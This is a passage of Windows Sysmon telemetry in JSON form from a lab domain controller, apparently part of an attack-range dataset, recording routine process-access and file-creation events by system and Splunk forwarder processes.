05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7698,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7699,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7700,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7701,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7702,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:50.950\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04C8-5F25-0000-0010198B1000}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:50.950","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04C8-5F25-0000-0010198B1000}","TargetProcessId":"2672","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7703,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.090\r\nSourceProcessGUID: {A837DB8D-04D6-5F25-0000-0010625E1100}\r\nSourceProcessId: 2672\r\nSourceThreadId: 2512\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.090","SourceProcessGUID":"{A837DB8D-04D6-5F25-0000-0010625E1100}","SourceProcessId":"2672","SourceThreadId":"2512","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7704,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:51.262\r\nProcessGuid: {A837DB8D-04D6-5F25-0000-0010F2581100}\r\nProcessId: 2276\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\8e4-0\\System.ServiceModel.Routing.dll\r\nCreationUtcTime: 2020-08-01 05:59:51.262","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:51.262","ProcessGuid":"{A837DB8D-04D6-5F25-0000-0010F2581100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\8e4-0\\System.ServiceModel.Routing.dll","CreationUtcTime":"2020-08-01 05:59:51.262","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7705,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.293\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D7-5F25-0000-001039611100}\r\nTargetProcessId: 2208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:51.293","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D7-5F25-0000-001039611100}","TargetProcessId":"2208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7706,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:51.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: 